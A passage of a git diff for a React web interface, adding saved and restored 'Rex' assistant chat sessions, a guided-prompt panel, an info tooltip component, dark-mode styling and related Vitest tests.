+      mockClientGet.mockRejectedValueOnce({ response: { status: 404 } });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          rexSessionStorageKey="agent-edit:audit-agent"
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      await waitFor(() => {
+        expect(mockClientGet).toHaveBeenCalledWith('/api/session/missing-session-1');
+        expect(window.localStorage.getItem(
+          'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        )).toBeNull();
+      });
+
+      const latestSessionChatProps = vi.mocked(SessionChat).mock.calls.at(-1)?.[0] as any;
+      expect(latestSessionChatProps.sessionId).toBeNull();
+      expect(latestSessionChatProps.welcomeContent).toBeTruthy();
+      expect(mockUseSessionChat).not.toHaveBeenCalledWith(expect.objectContaining({
+        initialSessionId: 'missing-session-1',
+      }));
+    });
   });
 
   describe('Header', () => {
diff --git a/webui/src/components/common/EntitySheet.tsx b/webui/src/components/common/EntitySheet.tsx
index 373e18053..d999bc1fb 100644
--- a/webui/src/components/common/EntitySheet.tsx
+++ b/webui/src/components/common/EntitySheet.tsx
@@ -19,7 +19,6 @@ import {
   MessageSquare,
   Loader2,
   AlertCircle,
-  Wand2,
   ArrowRight,
   TestTube,
   Send,
@@ -28,9 +27,17 @@ import {
 } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import client from '@/api/client';
-import SessionChat from './SessionChat';
+import SessionChat, { buildInstructionDisplayText, type SessionChatDisplay } from './SessionChat';
 import { useSessionChat } from '@/hooks/useSessionChat';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
+import ChatGuideDock, { type ChatGuideAction } from './ChatGuideDock';
+import GuidedCreatePanel, { type GuidedCreateGroup } from './GuidedCreatePanel';
+import type { Agent } from '@/api/agent';
+import {
+  SIDE_PANEL_MIN_WIDTH,
+  getInitialSidePanelWidth,
+  getMaxSidePanelWidth,
+} from './sidePanelSizing';
 // ─── Context ──────────────────────────────────────────────────────────────────
 
 interface EntitySheetCtx {
@@ -41,6 +48,41 @@ interface EntitySheetCtx {
 }
 
 const EntitySheetContext = createContext<EntitySheetCtx>({ openRex: () => {}, openTest: () => {} });
+const REX_WORKBENCH_DISPLAY: SessionChatDisplay = {
+  collapseIntermediateSteps: true,
+  processGroupsDefaultOpen: false,
+};
+const EXTRACT_FROM_REX_GUIDE_PROMPT = '__flocks_extract_from_rex__';
+const REX_SESSION_STORAGE_PREFIX = 'flocks:entity-sheet:rex-session:v1';
+
+function rexSessionStorageKey(key: string): string {
+  return `${REX_SESSION_STORAGE_PREFIX}:${key}`;
+}
+
+function readStoredRexSessionId(key?: string | null): string | null {
+  if (!key || typeof window === 'undefined') return null;
+
+  try {
+    return window.localStorage.getItem(rexSessionStorageKey(key));
+  } catch {
+    return null;
+  }
+}
+
+function writeStoredRexSessionId(key: string | undefined, sessionId: string | null) {
+  if (!key || typeof window === 'undefined') return;
+
+  try {
+    const storageKey = rexSessionStorageKey(key);
+    if (sessionId) {
+      window.localStorage.setItem(storageKey, sessionId);
+    } else {
+      window.localStorage.removeItem(storageKey);
+    }
+  } catch {
+    // Ignore storage failures; the active in-memory chat still works.
+  }
+}
 
 /** Consume inside form content to get access to openRex() / openTest() */
 export function useEntitySheet() {
@@ -79,7 +121,7 @@ export interface EntitySheetProps {
   onClose: () => void;
   onSubmit: () => void | Promise<void>;
   /**
-   * If provided, a "从 Rex 提取配置" button appears in the Rex tab.
+   * If provided, a "从 Rex 提取配置" action appears in the Rex tab.
    * Called with current sessionId when the button is clicked.
    * Should resolve on success (EntitySheet auto-switches to form tab)
    * or throw on failure (error is shown to user).
@@ -96,10 +138,30 @@ export interface EntitySheetProps {
   hideRex?: boolean;
   /** Hide Test tab */
   hideTest?: boolean;
-  /** Hide form tab (rex-only sheet, e.g. API 创建只能从 AI 编辑开始) */
+  /** Hide form tab (rex-only sheet, e.g. API 创建只能从工作台开始) */
   hideForm?: boolean;
   /** Initial tab when open (e.g. "form" to show 详情 first when creating) */
   initialTab?: 'form' | 'rex';
+  /** Guided actions shown in the Rex tab before and after the conversation starts. */
+  rexGuideGroups?: GuidedCreateGroup[];
+  rexGuidePanelTitle?: string;
+  rexGuidePanelDesc?: string;
+  rexGuideEmptyTitle?: string;
+  rexGuideCollapseTitle?: string;
+  rexGuideExpandTitle?: string;
+  rexGuideIcon?: React.ReactNode;
+  /** SessionChat composer options for Rex-assisted pages. */
+  rexAgentName?: string;
+  rexMentionAgents?: Agent[];
+  rexModel?: { providerID: string; modelID: string } | null;
+  rexSupportsVision?: boolean | null;
+  rexContextWindowTokens?: number | null;
+  /** Persist and resume the Rex conversation across refreshes when provided. */
+  rexSessionStorageKey?: string;
+  rexToolbarSlot?: React.ReactNode;
+  rexCenterToolbarSlot?: React.ReactNode;
+  rexComposerTextareaMinHeight?: number;
+  rexComposerTextareaMaxHeight?: number;
   /** Optional element rendered on the left side of the form-tab footer (e.g. delete button) */
   footerLeft?: React.ReactNode;
 }
@@ -119,8 +181,8 @@ export default function EntitySheet({
   submitLoading,
   submitLabel,
   width: initialWidth,
-  minWidth = 400,
-  maxWidth = 800,
+  minWidth = SIDE_PANEL_MIN_WIDTH,
+  maxWidth,
   onClose,
   onSubmit,
   onExtractFromRex,
@@ -130,10 +192,29 @@ export default function EntitySheet({
   hideTest = false,
   hideForm = false,
   initialTab,
+  rexGuideGroups,
+  rexGuidePanelTitle,
+  rexGuidePanelDesc,
+  rexGuideEmptyTitle,
+  rexGuideCollapseTitle,
+  rexGuideExpandTitle,
+  rexGuideIcon,
+  rexAgentName,
+  rexMentionAgents,
+  rexModel,
+  rexSupportsVision,
+  rexContextWindowTokens,
+  rexSessionStorageKey,
+  rexToolbarSlot,
+  rexCenterToolbarSlot,
+  rexComposerTextareaMinHeight,
+  rexComposerTextareaMaxHeight,
   footerLeft,
 }: EntitySheetProps) {
   const { t } = useTranslation('common');
   const supportsVision = useDefaultModelVision();
+  const resolvedInitialWidth = () => initialWidth ?? getInitialSidePanelWidth();
+  const resolvedMaxWidth = maxWidth ?? getMaxSidePanelWidth();
   const showTabs = !(hideRex && hideTest);
   const hasFormTab = !hideForm;
   const title =
@@ -157,10 +238,12 @@ export default function EntitySheet({
   const [extracting, setExtracting] = useState(false);
   const [extractError, setExtractError] = useState<string | null>(null);
   const [rexInitialMessage, setRexInitialMessage] = useState<string | null>(null);
-  const [drawerWidth, setDrawerWidth] = useState(initialWidth ?? 560);
+  const [storedRexSessionId, setStoredRexSessionId] = useState<string | null>(null);
+  const [rexSessionHydrated, setRexSessionHydrated] = useState(() => !rexSessionStorageKey);
+  const [drawerWidth, setDrawerWidth] = useState(resolvedInitialWidth);
   const [isDragging, setIsDragging] = useState(false);
   const dragStartX = useRef(0);
-  const dragStartWidth = useRef(560);
+  const dragStartWidth = useRef(resolvedInitialWidth());
 
   // ── Rex session via unified hook ──────────────────────────────────────────
   const {
@@ -176,7 +259,48 @@ export default function EntitySheet({
     category: 'entity-config',
     contextMessage: rexSystemContext,
     welcomeMessage: rexWelcomeMessage,
+    initialSessionId: storedRexSessionId,
   });
+  const activeRexSessionId = storedRexSessionId || sessionId;
+
+  useEffect(() => {
+    let cancelled = false;
+    setRexSessionHydrated(false);
+
+    const stored = readStoredRexSessionId(rexSessionStorageKey);
+    if (!stored) {
+      setStoredRexSessionId(null);
+      setRexSessionHydrated(true);
+      return () => {
+        cancelled = true;
+      };
+    }
+
+    (async () => {
+      try {
+        await client.get(`/api/session/${stored}`);
+        if (cancelled) return;
+        setStoredRexSessionId(stored);
+      } catch {
+        if (cancelled) return;
+        writeStoredRexSessionId(rexSessionStorageKey, null);
+        setStoredRexSessionId(null);
+      } finally {
+        if (!cancelled) {
+          setRexSessionHydrated(true);
+        }
+      }
+    })();
+
+    return () => {
+      cancelled = true;
+    };
+  }, [rexSessionStorageKey]);
+
+  useEffect(() => {
+    if (!rexSessionHydrated || !sessionId) return;
+    writeStoredRexSessionId(rexSessionStorageKey, sessionId);
+  }, [rexSessionHydrated, rexSessionStorageKey, sessionId]);
 
   // ── Test tab state ────────────────────────────────────────────────────────
   const [testPrompt, setTestPrompt] = useState(effectiveDefaultTestPrompt);
@@ -185,6 +309,46 @@ export default function EntitySheet({
   const [testError, setTestError] = useState<string | null>(null);
   const testTextareaRef = useRef<HTMLTextAreaElement>(null);
   const isComposingRef = useRef(false);
+  const effectiveRexGuideGroups = (rexGuideGroups ?? [])
+    .map((group) => ({
+      ...group,
+      actions: group.actions.filter((action) => action.label && action.prompt),
+    }))
+    .filter((group) => group.actions.length > 0);
+  const baseRexGuideActions: ChatGuideAction[] = effectiveRexGuideGroups.flatMap((group) => (
+    group.actions.map((action) => ({
+      ...action,
+      group: action.group ?? group.title,
+    }))
+  ));
+  const extractRexGuideAction: ChatGuideAction | null = onExtractFromRex && activeRexSessionId
+    ? {
+        label: t('entity.extractFromRex'),
+        description: t('entity.extractFromRexGuideDesc'),
+        prompt: EXTRACT_FROM_REX_GUIDE_PROMPT,
+        group: effectiveRexGuideGroups[0]?.title,
+      }
+    : null;
+  const rexGuideActions = extractRexGuideAction
+    ? [extractRexGuideAction, ...baseRexGuideActions]
+    : baseRexGuideActions;
+  const rexWelcomeGuideGroups = extractRexGuideAction
+    ? effectiveRexGuideGroups.length > 0
+      ? [
+          {
+            ...effectiveRexGuideGroups[0],
+            actions: [extractRexGuideAction, ...effectiveRexGuideGroups[0].actions],
+          },
+          ...effectiveRexGuideGroups.slice(1),
+        ]
+      : [{ title: '', actions: [extractRexGuideAction] }]
+    : effectiveRexGuideGroups;
+  const hasRexGuideActions = rexGuideActions.length > 0;
+  const showRexFooter =
+    activeTab === 'rex' &&
+    (Boolean(extractError) ||
+      Boolean(!onExtractFromRex && activeRexSessionId && hasFormTab) ||
+      (mode === 'create' && !hasRexGuideActions));
 
   // ── Auto-resize test textarea ─────────────────────────────────────────────
 
@@ -201,7 +365,9 @@ export default function EntitySheet({
   useEffect(() => {
     if (!open) {
       setActiveTab(getDefaultTab());
-      resetRexSession();
+      if (!rexSessionStorageKey) {
+        resetRexSession();
+      }
       setRexInitialMessage(null);
       setExtracting(false);
       setExtractError(null);
@@ -209,9 +375,9 @@ export default function EntitySheet({
       setTestLoading(false);
       setTestError(null);
       setTestPrompt(effectiveDefaultTestPrompt);
-      setDrawerWidth(initialWidth ?? 560);
+      setDrawerWidth(resolvedInitialWidth());
     }
-  }, [open, mode, defaultTestPrompt, resetRexSession, initialWidth, showTabs, hideRex, hideForm, initialTab]);
+  }, [open, mode, defaultTestPrompt, resetRexSession, initialWidth, showTabs, hideRex, hideForm, initialTab, rexSessionStorageKey]);
 
   // ── Tab handling ──────────────────────────────────────────────────────────
 
@@ -236,7 +402,7 @@ export default function EntitySheet({
 
       const handleMouseMove = (ev: MouseEvent) => {
         const delta = dragStartX.current - ev.clientX;
-        setDrawerWidth(Math.min(maxWidth, Math.max(minWidth, dragStartWidth.current + delta)));
+        setDrawerWidth(Math.min(resolvedMaxWidth, Math.max(minWidth, dragStartWidth.current + delta)));
       };
 
       const handleMouseUp = () => {
@@ -248,7 +414,7 @@ export default function EntitySheet({
       window.addEventListener('mousemove', handleMouseMove);
       window.addEventListener('mouseup', handleMouseUp);
     },
-    [minWidth, maxWidth],
+    [minWidth, resolvedMaxWidth],
   );
 
   // ── openRex (exposed via context) ─────────────────────────────────────────
@@ -256,15 +422,18 @@ export default function EntitySheet({
   const openRex = useCallback(
     (msg?: string) => {
       setActiveTab('rex');
-      if (sessionId && msg) {
-        client.post(`/api/session/${sessionId}/prompt_async`, {
+      if (activeRexSessionId && msg) {
+        const payload: Record<string, unknown> = {
           parts: [{ type: 'text', text: msg }],
-        });
+        };
+        if (rexAgentName) payload.agent = rexAgentName;
+        if (rexModel) payload.model = rexModel;
+        client.post(`/api/session/${activeRexSessionId}/prompt_async`, payload);
       } else if (msg) {
-        createAndSendRex({ text: msg }).catch(() => {});
+        createAndSendRex({ text: msg, agent: rexAgentName, model: rexModel }).catch(() => {});
       }
     },
-    [sessionId, createAndSendRex],
+    [activeRexSessionId, createAndSendRex, rexAgentName, rexModel],
   );
 
   // ── openTest (exposed via context) ────────────────────────────────────────
@@ -296,19 +465,33 @@ export default function EntitySheet({
 
   // ── Extract from Rex ──────────────────────────────────────────────────────
 
-  const handleExtract = async () => {
-    if (!sessionId || !onExtractFromRex) return;
+  const handleExtract = useCallback(async () => {
+    if (!activeRexSessionId || !onExtractFromRex) return;
     setExtracting(true);
     setExtractError(null);
     try {
-      await onExtractFromRex(sessionId);
+      await onExtractFromRex(activeRexSessionId);
       setActiveTab('form');
     } catch (err: unknown) {
       setExtractError(err instanceof Error ? err.message : t('entity.extractFailed'));
     } finally {
       setExtracting(false);
     }
-  };
+  }, [activeRexSessionId, onExtractFromRex, t]);
+
+  const startRexGuidePrompt = useCallback((prompt: string, label: string) => {
+    if (prompt === EXTRACT_FROM_REX_GUIDE_PROMPT) {
+      void handleExtract();
+      return;
+    }
+
+    createAndSendRex({
+      text: prompt,
+      agent: rexAgentName,
+      model: rexModel,
+      displayText: buildInstructionDisplayText(label),
+    }).catch(() => {});
+  }, [createAndSendRex, handleExtract, rexAgentName, rexModel]);
 
   if (!open) return null;
 
@@ -350,7 +533,7 @@ export default function EntitySheet({
 
           {/* Tabs */}
           {showTabs && (
-            <div className="flex px-6">
+            <div className="flex w-full px-6">
               {hasFormTab && (
                 <SheetTab
                   active={activeTab === 'form'}
@@ -484,23 +667,75 @@ export default function EntitySheet({
                   </button>
                 </div>
               )}
-              {!sessionError && (
+              {!sessionError && !rexSessionHydrated && (
+                <div className="flex items-center justify-center flex-1 text-sm text-gray-400 gap-2">
+                  <Loader2 className="w-4 h-4 animate-spin" />
+                  {t('entity.startingRex')}
+                </div>
+              )}
+              {!sessionError && rexSessionHydrated && (
                 <SessionChat
-                  sessionId={sessionId}
-                  live={!!sessionId}
+                  sessionId={activeRexSessionId}
+                  live={!!activeRexSessionId}
                   placeholder={t('entity.rexInputPlaceholder')}
-                  className="flex-1"
+                  className="h-full"
                   emptyText={t('entity.rexReady')}
+                  display={REX_WORKBENCH_DISPLAY}
                   initialMessage={rexInitialMessage}
-                  supportsVision={supportsVision}
-                  onCreateAndSend={!sessionId ? (text, imageParts) => createAndSendRex({ text, imageParts }) : undefined}
-                  welcomeContent={!sessionId ? (
-                    <div className="text-center max-w-md">
-                      <MessageSquare className="w-10 h-10 text-red-500 mx-auto mb-3" />
-                      <h3 className="text-lg font-semibold text-gray-900 mb-2">{t('entity.rexAssist')}</h3>
-                      <p className="text-sm text-gray-500">{t('entity.rexReady')}</p>
-                    </div>
-                  ) : undefined}
+                  agentName={rexAgentName}
+                  mentionAgents={rexMentionAgents}
+                  model={rexModel}
+                  supportsVision={rexSupportsVision ?? supportsVision}
+                  contextWindowTokens={rexContextWindowTokens}
+                  toolbarSlot={rexToolbarSlot}
+                  centerToolbarSlot={rexCenterToolbarSlot}
+                  composerTextareaMinHeight={rexComposerTextareaMinHeight}
+                  composerTextareaMaxHeight={rexComposerTextareaMaxHeight}
+                  onCreateAndSend={!activeRexSessionId ? (text, imageParts, agentOverride, modelOverride, options) => createAndSendRex({
+                    text,
+                    imageParts,
+                    agent: agentOverride || rexAgentName,
+                    model: modelOverride === undefined ? rexModel : modelOverride,
+                    displayText: options?.displayText,
+                  }) : undefined}
+                  welcomeContent={(
+                    hasRexGuideActions ? (
+                      <GuidedCreatePanel
+                        emptyTitle={rexGuideEmptyTitle ?? t('entity.rexReady')}
+                        icon={rexGuideIcon ?? <MessageSquare className="h-5 w-5" />}
+                        title={rexGuidePanelTitle ?? t('entity.rexAssist')}
+                        description={rexGuidePanelDesc ?? t('entity.rexReady')}
+                        groups={rexWelcomeGuideGroups}
+                        onStartPrompt={startRexGuidePrompt}
+                      />
+                    ) : (
+                      <div className="text-center max-w-md">
+                        <MessageSquare className="w-10 h-10 text-red-500 mx-auto mb-3" />
+                        <h3 className="text-lg font-semibold text-gray-900 mb-2">{t('entity.rexAssist')}</h3>
+                        <p className="text-sm text-gray-500">{t('entity.rexReady')}</p>
+                      </div>
+                    )
+                  )}
+                  conversationBottomSlot={({ sendPrompt, sending, streaming, hasMessages }) => (
+                    hasRexGuideActions && hasMessages ? (
+                      <ChatGuideDock
+                        actions={rexGuideActions}
+                        disabled={sending || streaming || extracting}
+                        collapseTitle={rexGuideCollapseTitle ?? t('entity.guideCollapse')}
+                        expandTitle={rexGuideExpandTitle ?? t('entity.guideExpand')}
+                        onStartPrompt={(prompt, label) => {
+                          if (prompt === EXTRACT_FROM_REX_GUIDE_PROMPT) {
+                            void handleExtract();
+                            return;
+                          }
+
+                          sendPrompt(prompt, {
+                            displayText: buildInstructionDisplayText(label),
+                          });
+                        }}
+                      />
+                    ) : null
+                  )}
                 />
               )}
             </div>
@@ -538,7 +773,7 @@ export default function EntitySheet({
         )}
 
         {/* ── Rex tab footer: extract / switch actions only ── */}
-        {activeTab === 'rex' && (
+        {showRexFooter && (
           <div className="flex-shrink-0 border-t border-gray-200 bg-white px-6 py-3">
             {extractError && (
               <p className="text-xs text-red-500 mb-2 flex items-center gap-1">
@@ -548,21 +783,7 @@ export default function EntitySheet({
             )}
             <div className="flex items-center justify-between">
               <div>
-                {onExtractFromRex && sessionId ? (
-                  <button
-                    onClick={handleExtract}
-                    disabled={extracting}
-                    className="flex items-center gap-1.5 text-sm text-red-600 hover:text-red-700 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
-                  >
-                    {extracting ? (
-                      <Loader2 className="w-4 h-4 animate-spin" />
-                    ) : (
-                      <Wand2 className="w-4 h-4" />
-                    )}
-                    {extracting ? t('entity.extracting') : t('entity.extractFromRex')}
-                    {!extracting && <ArrowRight className="w-3.5 h-3.5" />}
-                  </button>
-                ) : sessionId && hasFormTab ? (
+                {!onExtractFromRex && activeRexSessionId && hasFormTab ? (
                   <button
                     onClick={() => setActiveTab('form')}
                     className="flex items-center gap-1.5 text-sm text-gray-500 hover:text-gray-700 transition-colors"
@@ -573,9 +794,7 @@ export default function EntitySheet({
                 ) : null}
               </div>
 
-              {/* In create mode, show Done button directly in the Rex tab so the user
-                  doesn't have to switch to the form tab after the agent is created. */}
-              {mode === 'create' && (
+              {mode === 'create' && !hasRexGuideActions && (
                 <SubmitButtons
                   onClose={onClose}
                   onSubmit={onSubmit}
@@ -647,14 +866,14 @@ function SheetTab({
   return (
     <button
       onClick={onClick}
-      className={`flex items-center gap-1.5 px-4 py-2.5 text-sm font-medium border-b-2 transition-colors ${
+      className={`flex min-w-0 flex-1 items-center justify-center gap-1.5 px-3 py-2.5 text-sm font-medium border-b-2 transition-colors ${
         active
           ? 'border-red-600 text-red-600'
           : 'border-transparent text-gray-500 hover:text-gray-700 hover:border-gray-300'
       }`}
     >
-      {icon}
-      {children}
+      <span className="shrink-0">{icon}</span>
+      <span className="truncate">{children}</span>
     </button>
   );
 }
diff --git a/webui/src/components/common/GuideInfoIcon.tsx b/webui/src/components/common/GuideInfoIcon.tsx
new file mode 100644
index 000000000..5393af78d
--- /dev/null
+++ b/webui/src/components/common/GuideInfoIcon.tsx
@@ -0,0 +1,80 @@
+import { useCallback, useId, useState } from 'react';
+import { createPortal } from 'react-dom';
+import { Info } from 'lucide-react';
+
+interface GuideTooltip {
+  title: string;
+  description: string;
+  x: number;
+  y: number;
+}
+
+interface GuideInfoIconProps {
+  label: string;
+  description: string;
+  className?: string;
+}
+
+export default function GuideInfoIcon({
+  label,
+  description,
+  className = '',
+}: GuideInfoIconProps) {
+  const [tooltip, setTooltip] = useState<GuideTooltip | null>(null);
+  const tooltipId = useId();
+  const canPortal = typeof document !== 'undefined';
+
+  const showTooltip = useCallback((target: HTMLElement) => {
+    const rect = target.getBoundingClientRect();
+    setTooltip({
+      title: label,
+      description,
+      x: rect.left + rect.width / 2,
+      y: rect.top - 8,
+    });
+  }, [description, label]);
+
+  const hideTooltip = useCallback(() => setTooltip(null), []);
+
+  return (
+    <>
+      <span
+        tabIndex={0}
+        className={`inline-flex h-5 w-5 flex-shrink-0 items-center justify-center rounded-md text-zinc-300 transition-colors hover:bg-white/80 hover:text-rose-500 ${className}`}
+        aria-label={`${label}说明`}
+        aria-describedby={tooltip ? tooltipId : undefined}
+        role="img"
+        onMouseDown={(event) => {
+          event.preventDefault();
+          event.stopPropagation();
+        }}
+        onClick={(event) => {
+          event.preventDefault();
+          event.stopPropagation();
+        }}
+        onPointerEnter={(event) => showTooltip(event.currentTarget)}
+        onFocus={(event) => showTooltip(event.currentTarget)}
+        onMouseEnter={(event) => showTooltip(event.currentTarget)}
+        onMouseOver={(event) => showTooltip(event.currentTarget)}
+        onPointerLeave={hideTooltip}
+        onBlur={hideTooltip}
+        onMouseLeave={hideTooltip}
+      >
+        <Info className="h-3.5 w-3.5" aria-hidden="true" />
+      </span>
+      {tooltip && canPortal && createPortal(
+        <div
+          id={tooltipId}
+          role="tooltip"
+          className="pointer-events-none fixed z-[1000] w-52 -translate-x-1/2 -translate-y-full rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-600 shadow-md"
+          style={{ left: tooltip.x, top: tooltip.y }}
+        >
+          <div className="mb-0.5 font-semibold text-zinc-800">{tooltip.title}</div>
+          <div>{tooltip.description}</div>
+          <div className="absolute left-1/2 top-full -translate-x-1/2 border-4 border-transparent border-t-zinc-200" />
+        </div>,
+        document.body,
+      )}
+    </>
+  );
+}
diff --git a/webui/src/components/common/GuidedCreatePanel.test.tsx b/webui/src/components/common/GuidedCreatePanel.test.tsx
new file mode 100644
index 000000000..22c1a9715
--- /dev/null
+++ b/webui/src/components/common/GuidedCreatePanel.test.tsx
@@ -0,0 +1,34 @@
+import { render, screen } from '@testing-library/react';
+import { describe, expect, it, vi } from 'vitest';
+
+import GuidedCreatePanel from './GuidedCreatePanel';
+
+describe('GuidedCreatePanel', () => {
+  it('renders guide actions as workflow-style full-width rows', () => {
+    render(
+      <GuidedCreatePanel
+        title="Rex 辅助修改"
+        description="选择一个入口开始编辑"
+        groups={[{
+          title: '编辑引导',
+          actions: [
+            { label: '从 Rex 提取配置', description: '提取配置', prompt: 'extract' },
+            { label: '检查模型策略', description: '检查模型', prompt: 'model' },
+            { label: '调整温度', description: '调整温度', prompt: 'temperature' },
+            { label: '验证效果', description: '验证效果', prompt: 'verify' },
+          ],
+        }]}
+        onStartPrompt={vi.fn()}
+      />,
+    );
+
+    const section = screen.getByTestId('guided-create-section-编辑引导');
+
+    expect(section).toHaveClass('flex');
+    expect(section).toHaveClass('flex-col');
+    expect(section).not.toHaveClass('sm:grid-cols-2');
+    expect(screen.getByRole('button', { name: '从 Rex 提取配置' }).parentElement).toHaveClass('w-full');
+    expect(screen.getByRole('button', { name: '从 Rex 提取配置' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: '验证效果' })).toBeInTheDocument();
+  });
+});
diff --git a/webui/src/components/common/GuidedCreatePanel.tsx b/webui/src/components/common/GuidedCreatePanel.tsx
new file mode 100644
index 000000000..e15269556
--- /dev/null
+++ b/webui/src/components/common/GuidedCreatePanel.tsx
@@ -0,0 +1,142 @@
+import type { ReactNode } from 'react';
+import { MessageSquare } from 'lucide-react';
+import type { ChatGuideAction } from './ChatGuideDock';
+import GuideInfoIcon from './GuideInfoIcon';
+
+export interface GuidedCreateGroup {
+  title: string;
+  actions: ChatGuideAction[];
+}
+
+export function normalizeGuidedCreateActions(value: unknown, group?: string): ChatGuideAction[] {
+  if (!Array.isArray(value)) return [];
+  return value
+    .map((item) => {
+      if (!item || typeof item !== 'object') return null;
+      const raw = item as Record<string, unknown>;
+      const label = String(raw.label ?? '').trim();
+      const description = String(raw.description ?? '').trim();
+      const prompt = String(raw.prompt ?? '').trim();
+      const rawGroup = String(raw.group ?? '').trim();
+      if (!label || !prompt) return null;
+      return {
+        label,
+        description: description || prompt,
+        prompt,
+        ...((rawGroup || group) ? { group: rawGroup || group } : {}),
+      };
+    })
+    .filter((item): item is ChatGuideAction => item !== null);
+}
+
+export function buildGuidedCreateGroups(groups: Array<{ title: string; actions: unknown }>): GuidedCreateGroup[] {
+  return groups
+    .map((group) => ({
+      title: group.title,
+      actions: normalizeGuidedCreateActions(group.actions, group.title),
+    }))
+    .filter((group) => group.actions.length > 0);
+}
+
+interface GuidedCreatePanelProps {
+  emptyTitle?: string;
+  icon?: ReactNode;
+  title: string;
+  description: string;
+  groups: GuidedCreateGroup[];
+  scrollTestId?: string;
+  onStartPrompt: (prompt: string, label: string) => void;
+}
+
+export default function GuidedCreatePanel({
+  emptyTitle,
+  icon,
+  title,
+  description,
+  groups,
+  scrollTestId,
+  onStartPrompt,
+}: GuidedCreatePanelProps) {
+  const visibleGroups = groups
+    .map((group) => ({
+      ...group,
+      actions: group.actions.filter((action) => action.label && action.prompt),
+    }))
+    .filter((group) => group.actions.length > 0);
+
+  return (
+    <div className="flex min-h-[420px] w-full flex-col items-center justify-center px-5 py-8">
+      {emptyTitle && (
+        <p className="mb-8 text-center text-sm font-medium text-gray-400">
+          {emptyTitle}
+        </p>
+      )}
+      <div className="flex max-h-[min(560px,calc(100vh-260px))] w-full max-w-[420px] flex-col overflow-hidden rounded-xl border border-gray-200 bg-white px-5 py-5 text-center shadow-sm">
+        <div className="flex-shrink-0">
+          <div className="mx-auto flex h-11 w-11 items-center justify-center rounded-xl border border-red-100 bg-red-50 text-red-500">
+            {icon ?? <MessageSquare className="h-5 w-5" />}
+          </div>
+          <h3 className="mt-4 text-sm font-semibold text-gray-900">
+            {title}
+          </h3>
+          <p className="mx-auto mt-2 max-w-[300px] text-xs leading-relaxed text-gray-500">
+            {description}
+          </p>
+        </div>
+        <div
+          data-testid={scrollTestId}
+          className="mt-4 min-h-0 space-y-4 overflow-y-auto pr-1 text-left [scrollbar-width:thin] [scrollbar-color:#e4e4e7_transparent]"
+        >
+          {visibleGroups.map((group) => (
+            <GuidedCreateSection
+              key={group.title}
+              title={group.title}
+              actions={group.actions}
+              onStartPrompt={onStartPrompt}
+            />
+          ))}
+        </div>
+      </div>
+    </div>
+  );
+}
+
+function GuidedCreateSection({
+  title,
+  actions,
+  onStartPrompt,
+}: {
+  title: string;
+  actions: ChatGuideAction[];
+  onStartPrompt: (prompt: string, label: string) => void;
+}) {
+  return (
+    <section>
+      <h4 className="mb-2 text-[11px] font-semibold text-gray-400">{title}</h4>
+      <div
+        data-testid={`guided-create-section-${title}`}
+        className="flex flex-col gap-1.5"
+      >
+        {actions.map((action) => (
+          <div
+            key={action.label}
+            className="group flex h-8 w-full items-center justify-between gap-3 rounded-lg border border-gray-200 bg-white px-3 text-left text-xs font-semibold text-gray-700 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-600"
+          >
+            <button
+              type="button"
+              onClick={() => onStartPrompt(action.prompt, action.label)}
+              className="min-w-0 flex-1 truncate text-left"
+            >
+              {action.label}
+            </button>
+            <GuideInfoIcon
+              label={action.label}
+              description={action.description}
+              className="group-hover:text-rose-400"
+            />
+          </div>
+        ))}
+      </div>
+    </section>
+  );
+}
diff --git a/webui/src/components/common/LanguageSwitcher.tsx b/webui/src/components/common/LanguageSwitcher.tsx
index fd606e34a..3f473819e 100644
--- a/webui/src/components/common/LanguageSwitcher.tsx
+++ b/webui/src/components/common/LanguageSwitcher.tsx
@@ -27,7 +27,7 @@ export default function LanguageSwitcher({ collapsed = false }: LanguageSwitcher
     return (
       <button
         onClick={toggleLanguage}
-        className="flex items-center justify-center w-8 h-8 rounded-lg text-zinc-400 hover:text-zinc-600 hover:bg-white/60 transition-colors"
+        className="flex items-center justify-center w-8 h-8 rounded-lg text-zinc-400 hover:text-zinc-600 hover:bg-white/60 transition-colors dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
         title={t('switchLanguage')}
       >
         <Globe className="w-4 h-4" />
@@ -43,8 +43,8 @@ export default function LanguageSwitcher({ collapsed = false }: LanguageSwitcher
           onClick={() => handleChange(code)}
           className={`px-2.5 py-1 text-xs font-medium rounded-md transition-colors ${
             currentLang === code
-              ? 'bg-white text-zinc-900 shadow-sm'
-              : 'text-zinc-500 hover:bg-white/60 hover:text-zinc-800'
+              ? 'bg-white text-zinc-900 shadow-sm dark:bg-zinc-800 dark:text-zinc-50'
+              : 'text-zinc-500 hover:bg-white/60 hover:text-zinc-800 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100'
           }`}
         >
           {label}
diff --git a/webui/src/components/common/QuestionTool.test.tsx b/webui/src/components/common/QuestionTool.test.tsx
new file mode 100644
index 000000000..7ebf6b399
--- /dev/null
+++ b/webui/src/components/common/QuestionTool.test.tsx
@@ -0,0 +1,215 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+import { QuestionTool } from './QuestionTool';
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'question.multiSelect': '可多选',
+        'question.singleSelect': '单选',
+        'question.selectedCount': `已选 ${params?.count ?? 0} 项`,
+        'question.textPlaceholder': '请输入...',
+        'question.needsAnswer': '需要你的回答',
+        'question.customAnswer': '自定义 / 补充说明',
+        'question.confirm': '确认',
+        'question.skip': '跳过',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+describe('QuestionTool', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  it('requires standalone text answers before submitting', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          header: '自定义',
+          question: '如果没有补充说明，请留空。',
+          type: 'text',
